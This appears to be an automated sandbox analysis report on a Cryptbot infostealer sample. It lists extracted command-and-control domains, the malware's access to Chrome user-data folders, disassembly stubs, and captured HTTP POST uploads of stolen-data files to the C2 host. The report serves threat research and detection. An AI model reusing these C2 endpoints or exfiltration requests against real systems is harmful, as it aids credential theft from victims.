Source: v9dVG4fAGa.exe.5296.1.memstrmin |
Malware Configuration Extractor: Cryptbot {"C2 list": ["QUERY|rd|A|IN|tventji20vs.top", "home.tventji20vs.top", "HASH-DRBGs.top", "$home.tventji20vs.top", "gPtventji20vs.top", "tventji20vs.top", "vs.top", "0/80/home.tventji20vs.top", "llowtventji20vs.top", "0/80/tventji20vs.top", ":0/80/home.tventji20vs.top", "QUERY|rd|A|IN|home.tventji20vs.top", "QUERY|rd|AAAA|IN|home.tventji20vs.top", "s.top", "analforeverlovyu.top", "clietventji20vs.top"]} |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 10_2_00EE15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
10_2_00EE15B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 10_2_6CAF14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
10_2_6CAF14B0 |
Source: C:\Users\user\Desktop\v9dVG4fAGa.exe |
File opened: C:\Users\user\.ms-ad\ |
Jump to behavior |
Source: C:\Users\user\Desktop\v9dVG4fAGa.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\ |
Jump to behavior |
Source: C:\Users\user\Desktop\v9dVG4fAGa.exe |
File opened: C:\Users\user\AppData\ |
Jump to behavior |
Source: C:\Users\user\Desktop\v9dVG4fAGa.exe |
File opened: C:\Users\user\AppData\Local\Google\ |
Jump to behavior |
Source: C:\Users\user\Desktop\v9dVG4fAGa.exe |
File opened: C:\Users\user\AppData\Local\ |
Jump to behavior |
Source: C:\Users\user\Desktop\v9dVG4fAGa.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea ecx, dword ptr [esp+04h] |
10_2_00EE81E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
10_2_6CB6AC70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
10_2_6CB6AD20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
10_2_6CB6AD20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
10_2_6CB92EF0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
10_2_6CB0AF80 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6CBCF960h |
10_2_6CB0E8C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CB1E490 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
10_2_6CB1E490 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
10_2_6CB104F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, ecx |
10_2_6CB904E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CB10610 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CB1A790 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
10_2_6CB1A790 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
10_2_6CB1A720 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 2Ch |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
10_2_6CBB4750 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
10_2_6CB10010 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [6CBCD014h] |
10_2_6CBC4110 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
10_2_6CB1C2C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
10_2_6CB14263 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
10_2_6CB98250 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CB1A3A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
10_2_6CB1A3A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
10_2_6CB1A330 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
10_2_6CB6BDF0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+04h] |
10_2_6CB49F90 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
10_2_6CB6BF50 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
10_2_6CB2B987 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
10_2_6CB2B98B |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
10_2_6CBA9900 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
10_2_6CB6BAC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
10_2_6CB67AC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
10_2_6CBA9BF0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] |
10_2_6CB1D424 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6CBCDFF4h |
10_2_6CB63440 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+08h] |
10_2_6CB1D5A4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
10_2_6CB635F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+04h] |
10_2_6CB1D724 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
10_2_6CB1D050 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
10_2_6CB87100 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
10_2_6CB1D2B4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
10_2_6CB6B280 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [esp+04h] |
10_2_6CB693B0 |
Source: Malware configuration extractor |
URLs: QUERY|rd|A|IN|tventji20vs.top |
Source: Malware configuration extractor |
URLs: home.tventji20vs.top |
Source: Malware configuration extractor |
URLs: HASH-DRBGs.top |
Source: Malware configuration extractor |
URLs: $home.tventji20vs.top |
Source: Malware configuration extractor |
URLs: gPtventji20vs.top |
Source: Malware configuration extractor |
URLs: tventji20vs.top |
Source: Malware configuration extractor |
URLs: vs.top |
Source: Malware configuration extractor |
URLs: 0/80/home.tventji20vs.top |
Source: Malware configuration extractor |
URLs: llowtventji20vs.top |
Source: Malware configuration extractor |
URLs: 0/80/tventji20vs.top |
Source: Malware configuration extractor |
URLs: :0/80/home.tventji20vs.top |
Source: Malware configuration extractor |
URLs: QUERY|rd|A|IN|home.tventji20vs.top |
Source: Malware configuration extractor |
URLs: QUERY|rd|AAAA|IN|home.tventji20vs.top |
Source: Malware configuration extractor |
URLs: s.top |
Source: Malware configuration extractor |
URLs: analforeverlovyu.top |
Source: Malware configuration extractor |
URLs: clietventji20vs.top |
Source: global traffic |
HTTP traffic detected: GET /WoxlPHBXQCCaMPOisKAk1730000596 HTTP/1.1Host: home.tventji20vs.topAccept: */* |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: tventji20vs.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------VQx57EpNk8pBufOUiLT7OGData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 51 78 35 37 45 70 4e 6b 38 70 42 75 66 4f 55 69 4c 54 37 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 61 68 6f 70 61 72 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 7b 8f ae 45 dc bd a4 6f 74 cc e4 ae c7 5d 90 ca c5 4a f1 42 15 d7 95 c2 1c db 20 a0 a7 e2 a5 ea ae b1 e4 2e a1 97 b7 55 aa c3 fc 58 9b f0 0a 7f 6a d5 88 3a a4 c2 03 b9 0a 7c 4d a9 7c 12 0c 16 51 ae 44 8e ce 2b 9c 03 e6 34 e1 93 ba 19 4b c6 e1 9c 49 a3 fc 19 39 17 16 62 62 10 bc 9e 95 ee fa c5 95 22 b5 27 5c 91 11 35 bd 9f cb 7a 46 ad 7b 4c 38 43 d6 c4 63 0e 0d 97 f2 61 3c c9 79 70 58 aa 18 50 5f e7 2d 74 c1 28 ab 23 d3 55 db 29 54 2d ec 3a 3c 0a 08 32 e2 7d 51 66 79 2d 42 86 67 c9 fc cd f4 2c 79 28 cf a5 f0 2d 6b 3a 98 0b fd 9a f1 4a a6 cf 4c 72 7f 13 c8 a7 14 6f 27 8f 29 37 ff 0f 64 f9 79 f9 44 f7 2c fa cf 87 7f e4 c6 e5 a9 c8 eb a8 11 c6 34 d0 64 01 d4 7f ae f0 a8 0c 63 9e e7 5a f4 05 03 85 61 8c eb 3b 54 5b 23 15 2e 64 90 3e f9 1e 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 51 78 35 37 45 70 4e 6b 38 70 42 75 66 4f 55 69 4c 54 37 4f 47 2d 2d 0d 0a Data Ascii: --------------------------VQx57EpNk8pBufOUiLT7OGContent-Disposition: form-data; name="file"; filename="Cahopari.bin"Content-Type: application/octet-stream{Eot]JB .UXj:|M|QD+4KI9bb"'\5zF{L8Cca<ypXP_-t(#U)T-:<2}Qfy-Bg,y(-k:JLro')7dyD,4dcZa;T[#.d>--------------------------VQx57EpNk8pBufOUiLT7OG-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: tventji20vs.topAccept: */*Content-Length: 62971Content-Type: multipart/form-data; boundary=------------------------zIgSLgbYs2dLz9TaoCfrNLData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 7a 49 67 53 4c 67 62 59 73 32 64 4c 7a 39 54 61 6f 43 66 72 4e 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 54 65 66 69 62 65 74 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 27 cc dd cf be 14 80 21 83 a2 0e 7d b7 cd 72 5e c4 19 23 b2 dd f2 07 fd 19 b5 f4 3b 91 ca 52 38 28 78 2f b7 af 44 95 84 53 29 b1 06 c2 0f 8d bd 5c 7b 45 c1 74 bc 9c 9f 2d d1 7e 5c 0c da f4 94 5f 3f 70 41 f6 ce e4 90 b1 da 88 27 d6 d9 8b 6c b4 a4 78 0b 48 61 6c e9 65 86 1b e8 9b 48 57 10 e7 50 75 12 01 f9 3f f5 2b f7 e4 53 93 77 6c 88 19 3f 6e bd 09 f4 4b ae b3 2e 7d fd 10 61 d4 b9 4e dc 2c 9b 6f 65 a7 2a df d4 71 4c 72 96 4d 58 a0 7e 8f f3 26 9b 8b 69 44 3c 6b 70 2c b2 46 66 4c 7e e3 a5 3f 20 3f cf 3c 67 1c ac 20 c4 c3 51 ec 84 02 da 62 41 4f fa bb ab 07 8c f1 9f 09 ea 94 d2 0c df 96 f4 2d de e7 15 53 b6 9b 06 01 b2 42 36 c3 eb 94 ff 8c 40 3f 43 5a 0a 24 ee 91 03 f2 e9 8d 01 0a 58 f2 35 9d 18 f0 86 30 bd 03 c2 cf 7d cf e3 ee 58 2c 1a 32 43 34 1b ab f1 68 84 99 fc 17 e3 47 b3 51 84 f7 85 b6 9d 90 37 fb c0 8d f4 19 d4 90 43 c9 9f 6e 85 e6 0f fe 3d c5 ce ab 43 26 23 1f e1 56 21 6a 60 9a d4 cb aa 1a 8c 36 33 2c d4 19 f4 c6 74 9c f1 e4 22 32 a6 bd ce 1a 8d 9f 46 b4 3e 68 5a c9 2d 54 12 0b 57 93 a7 67 3c 6a 57 7d 9d 65 89 e9 3c 28 22 0a 30 9d 0a dd 0b 71 1a 74 2c 34 08 cf 9c 12 df 7e 8f f3 44 b3 d9 d3 d1 b8 80 bc bb 61 af 10 27 94 40 a4 11 6b ae 5e ec 83 4e e5 1f 3e 7a ea 74 cb af 14 04 6b e1 45 e1 49 fe 55 f4 82 df be b3 cb 23 5a bd 3c 84 92 0b 30 bc 88 62 87 40 73 ac cc 91 b1 41 1b bf 3b 34 cf bc 99 aa b5 b1 3c 02 c1 c8 7b 3f 99 39 06 cf 65 00 aa 16 c4 8e 8c 4b a4 e1 f2 23 35 30 c7 37 d3 4a 6f 5e dd f0 4f 24 4d ef b4 d1 8b 79 0d de 4c 5b df c1 dc 2b b6 2a 83 5c eb ab 85 2f 83 2a d3 1b 12 3c a2 b2 37 72 8e 05 d1 a5 2f b4 67 87 33 58 f5 1b 98 3d 3e f1 5f dc e0 b7 bf 0f f9 32 1e a4 cb 4a 7e 53 72 c2 bf 18 2d cc b0 1f d1 41 e0 f3 17 2d 4e a7 d8 d1 30 70 8e 5e 21 6a f3 1d 34 36 bc 87 04 02 26 10 20 25 14 01 30 1d 2f 94 3f df 6e 90 0a 2c be 72 38 7c ad 9d 5c b3 d8 c |